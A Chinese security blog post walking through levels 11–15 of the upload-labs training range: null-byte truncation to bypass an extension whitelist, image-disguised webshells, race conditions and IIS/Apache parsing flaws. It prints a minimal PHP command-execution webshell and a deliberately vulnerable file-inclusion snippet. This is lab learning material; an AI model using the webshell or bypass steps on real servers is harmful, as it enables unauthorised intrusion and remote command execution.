<!DOCTYPE html>
<html lang="en">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/微信图片_20200713154033.jpg">
  <link rel="icon" type="image/png" href="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/微信图片_20200713154033.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>upload-labs11-15通关 - SuQieR&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
<meta name="generator" content="Hexo 4.2.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SuQieR's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830204132.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-08-12 11:28">
      August 12, 2020 am
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.3k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      17
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h1 id="upload-labs11-15通关"><a href="#upload-labs11-15通关" class="headerlink" title="upload-labs11-15通关"></a>upload-labs11-15通关</h1><h3 id="pass11-00截断绕过"><a href="#pass11-00截断绕过" class="headerlink" title="pass11-00截断绕过"></a>pass11-00截断绕过</h3><p><strong>00截断原理</strong></p>
<ul>
<li>0x00是十六进制表示方法，是ascii码为0的字符，在有些函数处理时，会把字符当作结束符。</li>
<li>系统对文件名读取时，如果遇到0x00，就会认为读取结束</li>
<li>在php5.3之后的版本中完全修改00截断，并且00截断受限GPC(这里的GPC指的是php.ini中的magic_quotes_gpc)</li>
</ul>
<p><strong>GET型00截断</strong></p>
<ul>
<li>GET型提交的内容会被自动进行URL编码<ul>
<li>注意:一定要关闭GPC，否则无法成功</li>
</ul>
</li>
</ul>
<p><strong>验证代码分析</strong></p>
<ul>
<li><p>pass11从前面的黑名单验证变成了白名单验证</p>
<table>
<thead>
<tr>
<th align="center"><code>前面的红框，对用户上传的文件进行了随机化命名，而再拼接绿框中的后缀名</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830193429.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>burp进行00截断</strong></p>
<ul>
<li><p>上传名为1.jpg但是内容为phpinfo的文件</p>
<table>
<thead>
<tr>
<th align="center"><code>在保存路径后添加文件名1.php然后%00进行截断</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830193552.png" srcset="/img/loading.gif" alt="">`</td>
</tr>
<tr>
<td align="center"><code>绕过了白名单验证，复制图像地址进行访问发现报错找不到文件</code></td>
</tr>
<tr>
<td align="center">:———————————————————-:</td>
</tr>
<tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830193640.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
<li><p>因为%00已经截断了后面的随机化文件名,实际地址为</p>
<table>
<thead>
<tr>
<th align="center"><code>前面的2.php删除后面问号后面的内容就能访问了</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830193741.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>POST型00截断</strong></p>
<ul>
<li><p>在POST请求中，%00不会被自动解码，需要在十六进制中进行修改00</p>
</li>
<li><p>pass12代码分析</p>
<table>
<thead>
<tr>
<th align="center"><code>同样是和pass11一样采用随机化命名+拼接后缀名的方法，不过提交方法变成了POST</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830193830.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<ul>
<li><p>burpsuite截断，进行添加00</p>
<table>
<thead>
<tr>
<th align="center"><code>在upload后面添加3.php以及一个空格</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830194012.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center"><code>接着转到hex，找到那个空格也就是20，将其修改为00，接着转发</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830194039.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>成功上传</code></td>
</tr>
<tr>
<td align="center">:———————————————————-:</td>
</tr>
<tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830194122.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center"><code>复制图像地址进行访问也是和pass11报错</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830194151.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center"><code>一样需要将后面的随机化命名去掉访问3.php即可</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830194215.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>php编写简单的webshell</strong></p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> 
<span class="hljs-keyword">if</span>($_GET)&#123;
	$cmd = $_GET[<span class="hljs-string">'cmd'</span>];
	system($cmd)
&#125;<span class="hljs-keyword">else</span>&#123;

	<span class="hljs-keyword">echo</span> <span class="hljs-string">"no cmd"</span>
&#125;
<span class="hljs-meta">?&gt;</span></code></pre>



<h2 id="pass12-图片webshell上传"><a href="#pass12-图片webshell上传" class="headerlink" title="pass12-图片webshell上传"></a>pass12-图片webshell上传</h2><p><strong>图片webshell制作</strong></p>
<ul>
<li><p>在服务端的php代码中，对于用户上传的文件做文件类型检查，查看文件格式是否符合上传规范。可以检查文件二进制格式的前几个字节，从而判断文件类型是否正确</p>
</li>
<li><p>针对这种情况可以直接新建要给1.jpg其中代码内容如下</p>
<table>
<thead>
<tr>
<th align="center"><code>GIF98A是为了声明这是一个图片文件,将文件命名为5.jpg</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830194522.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>上传图片webshell</strong></p>
<ul>
<li><p>将制作好的图片webshell上传到服务器</p>
</li>
<li><p>其中可能content-Type验证。修改为image/gif或image/jpg符合当前文件类型的MIME</p>
<table>
<thead>
<tr>
<th align="center"><code>将内容为phpinfo的5.jpg进行上传，没有触发任何过滤</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830194644.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<table>
<thead>
<tr>
<th align="center"><code>右键复制图片地址进行访问，发现没有被当作php来解析</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830194723.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<p><strong>文件包含漏洞分析</strong></p>
<ul>
<li><p>在php中，适用include，require，include_once,require_once函数包含的文件都会被当作php代码执行。无论文件的名称是什么，只要文件内容符合php代码规范，都会被当作php代码执行</p>
</li>
<li><p>编写文件包含代码</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> 
$file=$_GET[<span class="hljs-string">'page'</span>];
<span class="hljs-keyword">include</span>($file);
<span class="hljs-meta">?&gt;</span></code></pre>
<table>
<thead>
<tr>
<th align="center"><code>结合文件包含输出phpinfo()</code></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200830201318.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td align="center"><code>要像使用图片webshell需要结合文件包含漏洞</code></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="pass13-竞争条件"><a href="#pass13-竞争条件" class="headerlink" title="pass13-竞争条件"></a>pass13-竞争条件</h2><p><strong>文件上传过程介绍</strong></p>
<ul>
<li>文件上传过程<ul>
<li>服务器获取文件 &gt; 保存上传临时文件 &gt; 重命名移动临时文件</li>
</ul>
</li>
</ul>
<p><strong>竞争条件原理介绍</strong></p>
<ul>
<li>网站逻辑：<ul>
<li>网站允许上传任意文件，然后检查文件上传中是否博包含webshell，如果包含，删除该文件</li>
<li>网站允许上传任意文件，但是如果不能指定文件类型，那么会使用unlink删除文件</li>
<li>在删除之前访问上传的php文件，从而执行上传文件中的php代码</li>
</ul>
</li>
</ul>
<p><strong>竞争条件代码分析</strong></p>
<ul>
<li>先进行上传，后判断与删除，利用时间差进行webshell上传</li>
<li>先是对文件进行判断是否符合规范，如果符合重命名上传，如果不符合调用unlink删除</li>
</ul>
<p>需要修改代码来达到绕过效果，环境有问题不做了。</p>
<p><a href="https://baynk.blog.csdn.net/article/details/102910267" target="_blank" rel="noopener">参考链接</a></p>
<h2 id="pass14-iis6-0解析漏洞"><a href="#pass14-iis6-0解析漏洞" class="headerlink" title="pass14-iis6.0解析漏洞"></a>pass14-iis6.0解析漏洞</h2><p><strong>iis6.0解析漏洞介绍</strong></p>
<ul>
<li><p>当建立<em>asa,,</em>.asp格式的文件夹时，其目录下的任意文件都将被iis当作asp文件解析。</p>
</li>
<li><p>当文件*.asp;1.jpg iis6.0同样会将文件作为asp文件解析</p>
</li>
<li><p>微软目前没有推出补丁，不认为是一个漏洞</p>
</li>
</ul>
<p><strong>本关环境需要iis6.0， 没搭建，略过</strong></p>
<p><a href="https://blog.csdn.net/weixin_41487522/article/details/106824929" target="_blank" rel="noopener">参考链接</a></p>
<h2 id="pass15-apache解析漏洞"><a href="#pass15-apache解析漏洞" class="headerlink" title="pass15-apache解析漏洞"></a>pass15-apache解析漏洞</h2><p><strong>apache解析漏洞</strong></p>
<ul>
<li>因为apache认为一个文件可以拥有多个扩展名，哪怕没有文件名，也可以拥有多个扩展名。apache认为应该从右到左开始判断解析方法。如果最右侧的扩展名不可识别，就继续往左判断，知道判断到文件名为止。</li>
</ul>
<p><strong>这里也没准备环境，略过</strong></p>
<p><a href="https://blog.csdn.net/qq_32434307/article/details/79480316" target="_blank" rel="noopener">参考链接</a></p>
<p><strong>文件上传就到这里，好像最新版的upload-labs出到20多关，有时间再试试吧</strong></p>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Web-penetration/">Web penetration</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">文件上传</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                      <a href="/2020/08/13/metasploitable2%E9%9D%B6%E6%9C%BAwebdav%E6%9C%8D%E5%8A%A1%E6%8F%90%E6%9D%83/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">metasploitable2  webdav服务提权</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/08/11/upload-labs%E9%80%9A%E5%85%B36-10/">
                        <span class="hidden-mobile">upload-labs6-10通关</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Power by SuQieR</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Hexo theme by Fluid</span></a>
    </div>
    
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


    
  <!-- 备案信息 -->
  <div class="beian">
    <a href="http://beian.miit.gov.cn/" target="_blank"
       rel="nofollow noopener">京 ICP 备 20020711 号</a>
    
      <a
        href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=20020711"
        rel="nofollow noopener"
        class="beian-police"
        target="_blank"
      >
        <span class="beian-police-sep">&nbsp;|&nbsp;</span>
        
          <img src="/img/police_beian.png" srcset="/img/loading.gif" alt="police-icon" />
        
        <span>京公网安备 11010802032018 号</span>
      </a>
     
  </div>


    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "upload-labs11-15通关&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script type="text/javascript">
      //定义获取词语下标
      var a_idx = 0;
      jQuery(document).ready(function ($) {
        //点击body时触发事件
        $("body").click(function (e) {
          //需要显示的词语
          var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正", "法治", "爱国", "敬业", "诚信", "友善");
          //设置词语给span标签
          var $i = $("<span/>").text(a[a_idx]);
          //下标等于原来下标+1  余 词语总数
          a_idx = (a_idx + 1) % a.length;
          //获取鼠标指针的位置，分别相对于文档的左和右边缘。
          //获取x和y的指针坐标
          var x = e.pageX, y = e.pageY;
          //在鼠标的指针的位置给$i定义的span标签添加css样式
          $i.css({
            "z-index": 999,
            "top": y - 20,
            "left": x,
            "position": "absolute",
            "font-weight": "bold",
            "color": rand_color()
          });
          // 随机颜色
          function rand_color() {
            return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
          }
          //在body添加这个标签
          $("body").append($i);
          //animate() 方法执行 CSS 属性集的自定义动画。
          //该方法通过CSS样式将元素从一个状态改变为另一个状态。CSS属性值是逐渐改变的，这样就可以创建动画效果。
          //详情请看http://www.w3school.com.cn/jquery/effect_animate.asp
          $i.animate({
            //将原来的位置向上移动180
            "top": y - 180,
            "opacity": 0
            //1500动画的速度
          }, 1500, function () {
            //时间到了自动删除
            $i.remove();
          });
        });
      })
      ;
    </script>
  











  

  

  

  

  

  





</body>
</html>
